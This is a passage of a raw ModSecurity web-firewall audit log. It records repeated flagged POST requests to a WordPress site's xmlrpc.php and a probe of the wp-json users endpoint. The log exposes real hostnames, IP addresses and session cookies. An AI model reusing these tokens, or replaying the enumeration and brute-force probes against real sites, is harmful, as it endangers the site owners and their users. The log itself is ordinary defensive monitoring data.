"OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6r8w9BijgXpeeI_r-9bwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986291238694 1008094 (- - -) Stopwatch2: 1749986291238694 1008094; combined=2871, p1=380, p2=2111, p3=95, p4=39, p5=152, sr=93, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9c97e556-Z-- --4b467b32-A-- [15/Jun/2025:16:49:12.617883 +0530] aE6sL1WckDejtnB0cwJWDQAAAAA 165.22.247.248 34298 127.0.0.1 7081 --4b467b32-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=2bhmvq07a6t89l4v5cbejn3q2f; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_2a7bf08bcbfed56ba92541f31749d1%7C%7C1750159150%7C%7C1750155550%7C%7C785d665ca66a1510ec80d413fd03d367; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=bb02b6b852f0a704fc03df42c5b8279e%7C%7C1750159151%7C%7C1750155551%7C%7C46b12b5ed584fbd62c1c5d06a0ba611b User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --4b467b32-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=asebhr9jcltq7c6lk1jn83pbt1; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_699a19fe8995150e5d94e957195c83%7C%7C1750159152%7C%7C1750155552%7C%7C134dd1f2f8156813920f046a0c0aa40f; expires=Tue, 17 Jun 2025 11:19:12 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5564ca36452b4c569fe9ed44df171bcd%7C%7C1750159152%7C%7C1750155552%7C%7C8bc13a347980fdc58399adf25848e252; expires=Tue, 17 Jun 2025 11:19:12 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4b467b32-E-- --4b467b32-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6sL1WckDejtnB0cwJWDQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986351410004 1207971 (- - -) Stopwatch2: 1749986351410004 1207971; combined=3101, p1=409, p2=2244, p3=130, p4=42, p5=170, sr=98, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4b467b32-Z-- --13a89262-A-- [15/Jun/2025:16:50:12.346660 +0530] aE6saw9BijgXpeeI_r-9swAAAAE 165.22.247.248 43720 127.0.0.1 7081 --13a89262-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=bn564a9epqehppmf9ce0um8148; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b9428e535694ebac1d774b34f4e777%7C%7C1750159210%7C%7C1750155610%7C%7Ce87d52b4c04525527cb7a086982bc7c3; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=da4d83155fd5f7b621cc279b1f3fc665%7C%7C1750159211%7C%7C1750155611%7C%7Ccf75af79df8377951bd68b08c3313da2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --13a89262-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=732e09pr9lhu687j302qt1qr89; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_048462b5430acade804d5dab4d7233%7C%7C1750159212%7C%7C1750155612%7C%7C25ebc1ca8aac4e1d468b3731edb1a845; expires=Tue, 17 Jun 2025 11:20:12 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b11e3b62ffb92cf9ec61e174f9005517%7C%7C1750159212%7C%7C1750155612%7C%7Cccaa0c717fb56137143049cca2453f9e; expires=Tue, 17 Jun 2025 11:20:12 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --13a89262-E-- --13a89262-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6saw9BijgXpeeI_r-9swAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986411316459 1030282 (- - -) Stopwatch2: 1749986411316459 1030282; combined=2998, p1=407, p2=2204, p3=98, p4=35, p5=158, sr=112, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13a89262-Z-- --11d3b605-A-- [15/Jun/2025:16:51:12.324132 +0530] aE6sp315LOn2YRwTZIgJzgAAAAc 165.22.247.248 34688 127.0.0.1 7081 --11d3b605-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 Cookie: PHPSESSID=lg6k90aunn6agmv9oilm25ffko; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_1357d184f198fe43ab4862beeb7aad%7C%7C1750159270%7C%7C1750155670%7C%7Ce45533dda24005d0e43bec051f7e8768; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b1fee551a9bf0319aa343a2302db5346%7C%7C1750159271%7C%7C1750155671%7C%7Cc47de90c1421d34a33c5ba9b78ac6040 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --11d3b605-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=h12eoim7vak97bgj9ui0iuse8q; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4df508c632632ea9f805f62ea0695d%7C%7C1750159272%7C%7C1750155672%7C%7C06cc8fcec6e4afb787ac01b03bf446e8; expires=Tue, 17 Jun 2025 11:21:12 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=fbd2b8a4dd99ed6a6e85bad51c0f50dc%7C%7C1750159272%7C%7C1750155672%7C%7C6c3852d9f9aa8dc94f078ed3ec917a75; expires=Tue, 17 Jun 2025 11:21:12 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --11d3b605-E-- --11d3b605-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6sp315LOn2YRwTZIgJzgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986471282055 1042179 (- - -) Stopwatch2: 1749986471282055 1042179; combined=2962, p1=422, p2=2130, p3=103, p4=37, p5=167, sr=112, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --11d3b605-Z-- --4ea83d1c-A-- [15/Jun/2025:16:52:12.248065 +0530] aE6s4xRnvL96XFagPFC3MAAAAAY 165.22.247.248 33132 127.0.0.1 7081 --4ea83d1c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=jfejb558rrcm9gh7usqmnup7bk; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_9e396bb0dd1bb2b649315c80abb5c5%7C%7C1750159330%7C%7C1750155730%7C%7Cb1ce606f99b16f938c31782406944209; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=951a35df89778e5bf8111ae961133e2d%7C%7C1750159330%7C%7C1750155730%7C%7Cee777b16c6281d3ebfe2462b90751ed9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --4ea83d1c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=ugjv9agrnrg5056f9s0r9ijl83; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_16a925060fb78abe039b85002059c3%7C%7C1750159332%7C%7C1750155732%7C%7Ca0ba26cd3d1b6628ffcdd6548b374695; expires=Tue, 17 Jun 2025 11:22:12 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=962e6b049ca5d7ec6daddb3fd6f2e62a%7C%7C1750159332%7C%7C1750155732%7C%7C02a2a96346e2211900d41caee854444a; expires=Tue, 17 Jun 2025 11:22:12 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4ea83d1c-E-- --4ea83d1c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6s4xRnvL96XFagPFC3MAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986531162188 1085990 (- - -) Stopwatch2: 1749986531162188 1085990; combined=3283, p1=399, p2=2491, p3=110, p4=37, p5=154, sr=102, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4ea83d1c-Z-- --fc792932-A-- [15/Jun/2025:16:53:12.299302 +0530] aE6tH1u1-lKBbvo2E9pAIwAAAAw 165.22.247.248 56666 127.0.0.1 7081 --fc792932-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=4sbiessc6u66l7imojoiks6gkd; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_670782acb047d58fb87b4b79c5d0d7%7C%7C1750159390%7C%7C1750155790%7C%7C7f5b60be61af552b4287fafb92eeb8e3; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=cf3a13917966c228a3950f5b94ad8b31%7C%7C1750159391%7C%7C1750155791%7C%7Cd69e3bfca995f5f5c1750dc9cef0e91d User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --fc792932-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=sp5a5dtiua696e20093me019fi; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3935c139e05ed0c0f0a68842e7ca28%7C%7C1750159392%7C%7C1750155792%7C%7C578ec7825fdfd2e2c22b38d079a96557; expires=Tue, 17 Jun 2025 11:23:12 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b9ba18e814e9be69fb2cff84cbeb9947%7C%7C1750159392%7C%7C1750155792%7C%7C3e2fd092a2f0b8d0fcb53835a2d484b1; expires=Tue, 17 Jun 2025 11:23:12 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fc792932-E-- --fc792932-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6tH1u1-lKBbvo2E9pAIwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986591277077 1022318 (- - -) Stopwatch2: 1749986591277077 1022318; combined=3294, p1=453, p2=2378, p3=119, p4=44, p5=186, sr=108, sw=114, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc792932-Z-- --8c105036-A-- [15/Jun/2025:16:54:12.843557 +0530] aE6tWzS8xKUOR1xBR5boZAAAAAM 165.22.247.248 38880 127.0.0.1 7081 --8c105036-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=o9qsf0icblv90d4mb72hkmcnjf; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_45c04cdc9114a747be337d73008d1b%7C%7C1750159451%7C%7C1750155851%7C%7C85922de4fa867b3cf414a4432f58d746; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=81c0af648a1761e5a7f2bb6c61867d60%7C%7C1750159451%7C%7C1750155851%7C%7Ce3856f8b764ec8eccbbf52b767d7f9ba User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --8c105036-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=3thubldtvfn3tqjol4su6qfct6; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_37554abfedfd34bfca4bc39fcac464%7C%7C1750159452%7C%7C1750155852%7C%7C16e97c25504434ce89ace8c95b20c903; expires=Tue, 17 Jun 2025 11:24:12 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=234f1882151b802ee4b707e57cde69dd%7C%7C1750159452%7C%7C1750155852%7C%7C651c15cba44679117b7ce0059ede0800; expires=Tue, 17 Jun 2025 11:24:12 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8c105036-E-- --8c105036-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6tWzS8xKUOR1xBR5boZAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986651812925 1030713 (- - -) Stopwatch2: 1749986651812925 1030713; combined=2537, p1=328, p2=1788, p3=111, p4=42, p5=168, sr=78, sw=100, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c105036-Z-- --b3cb7145-A-- [15/Jun/2025:16:55:13.194212 +0530] aE6tmFu1-lKBbvo2E9pAZwAAAAw 165.22.247.248 49322 127.0.0.1 7081 --b3cb7145-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=03umitiqt2snlcng9omn2o58tf; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3619e27a4367a605c386e23e8680d1%7C%7C1750159511%7C%7C1750155911%7C%7Ccb6885a4253d664742f0b94845068ec1; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=772a7954faa18da8a960173a5ae687fb%7C%7C1750159511%7C%7C1750155911%7C%7C423de6fd22b5b5c91f525020fc73ee49 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --b3cb7145-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=41s66fu4pfobkpcqdf5ohjl9b2; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_21b97d5bc52c5ca9dc949d71474dc4%7C%7C1750159512%7C%7C1750155912%7C%7Ccb45c954fd33c8aa272103905dd310f2; expires=Tue, 17 Jun 2025 11:25:12 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=7713b451a7c1e52a84db118ddfffc0d4%7C%7C1750159513%7C%7C1750155913%7C%7Cdab7d8dba2ddb66e61113ad0d749ad17; expires=Tue, 17 Jun 2025 11:25:13 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b3cb7145-E-- --b3cb7145-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6tmFu1-lKBbvo2E9pAZwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986712139503 1054789 (- - -) Stopwatch2: 1749986712139503 1054789; combined=3052, p1=404, p2=2296, p3=82, p4=35, p5=147, sr=107, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b3cb7145-Z-- --d4521d75-A-- [15/Jun/2025:16:55:14.221499 +0530] aE6tmVWckDejtnB0cwJW2QAAAAA 165.232.165.24 49534 127.0.0.1 7081 --d4521d75-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 165.232.165.24 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: XSRF-TOKEN=eyJpdiI6Ind2a3BabTJlVGZhcjJSNjFPT21XQ0E9PSIsInZhbHVlIjoiZVhhVHRqQm5NYlE4cUZUNWVPRzhyR2JoOG05RGttcFBwcFFJSm5ESnB2VXBYYVo0MXVRVGVDWDhQc0hUMjlYNDNkaFVBbWNlZTVPWThXMmREYjc0a0k1YzdwNGRYUU5oazhGMHlpTVNMSXNzbndVUENUaWh4R1l0b2VzNWV2dmsiLCJtYWMiOiIwYWFkNzdmMTg5MGVkMWNjMTcwOTljMzI4MTcxNGJkMGEyOTFiMjA1ZGExYTVlNTQ3ODIwMTVlODU2OGE5ZTQyIn0%3D; template_server_session=eyJpdiI6InEvK0pqeEhvaEF3aWhCR0srMDRsR0E9PSIsInZhbHVlIjoiQXhGSGE5QzlQTXg3MUR3Y0QyYmRDQWF5NWpvWGZWZkxGNXNMcG9PN3dMOU9Wb0ZmcXRnUm0xcFdrVEg5cEJNZnR6b284QXZLc2VOL0s3TWtQcG9NSkRzWEpkRGdBNWdweWUzWCtQVWZ4eWVpWERxQVVmeVE3Yk9WTmJYSjJDNE0iLCJtYWMiOiIxNDk2OTgyNzQ2OGZkZTk0NWNmOWJmNzBiNGY1MjJkMDkyODhlMmI4OTY2MDI1ZTRmODgzMGZjOTIwMTJlNjMwIiwidGFnIjoiIn0%3D; vsid=911vr4975180909837203; __slsid=7164b63f8bf61dcaa93fb6e754418d0a1d69ce3777d8afbf82eafd6331514b30; __pq=1749972501064; __cf_bm=CCgpOtNetXVq5STUAoLF6QjpCe_LIcyO.6zvw52qZso-1749986547-1.0.1.1-Jj03f5DlIswr7nfOKptXOatKQWm8upIHrbxlh63lZHNnlP93l2K1O8CyYFuIq15m9YS427FWzBso3pnuPjmd_wt6sqy6s3SeLoQqOWR_sSRi0UOI3QCxe3Hq7m6LxmBr; dps_site_id=ap-southeast-1; __ddg8_=p1q3UxOw4Wliqgo3; __ddg10_=1749986639; __ddg9_=165.232.165.24; __ddg1_=StmqTHX3x7pvS37xVp7N; X-Detail=403 20; parking_session=0e0242e5-ef01-4da3-880f-81f4bf3b808b; _cfuvid=fc6PHyR6ovZDrUTnTlJuATxhwNdOkmn2cDDXe7kUyFg-1749972775811-0.0.1.1-604800000; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=19e60dbdc6108813213768272934521b; locale=en_US; filehosting=1v8dpihetng61r05tsjr241vch; ASP.NET_SessionId=h5uxpdcn0fl0pumt535m3yfp; owner-stable-id=fcf9b653-f698-46a7-9bc0-40761d187303; owner-brand-id=u1SKyCG0LYOF; atrium_global_session=eyJpdiI6IlZmaWVHbFFhUEl5dWZwd2tPUmhFYkE9PSIsInZhbHVlIjoiZkxPSGNMMzVobFlZbjc2SXdTQUlrZ1M2aW5CSGJaSEd5ZXUvRlNBYSthcEtoVG9BUm9TL2IveTZ5Q0p6NVhJQUkyYWJvaGY2MjlSbEoxNjNPSTFOMWFwd0NHNWVqdDdPc1JJTzhQUUxHZHA4OUU0eWpwbFNwRmRCMkNZekVYWmciLCJtYWMiOiJiOTdmMzRkNGVkYzliNTY3MmI2MGVlNDYzOGNmMGVjOGFlMTcyMmZmYzFkYjgzNmVhNjY5N2M2YjY2OTU1NzhhIiwidGFnIjoiIn0%3D; INGRESSCOOKIE=FA4E6005D59B2A4666FA56822405039F; sid1=5AE499E57ABC4266860272BA4B3A6780; st4-sid=s%3A0UmFxq9VGG_Vl2K0T-kFXqvuMWabhZvy.YN84QZXAR9LWEIXMIEUPR5RTH0trfJneCa0LP1W7n9o; sid=6bea1198-49c0-11f0-b2c7-320cf352c4f5; p0d=sxxwbr-e3ebe972; 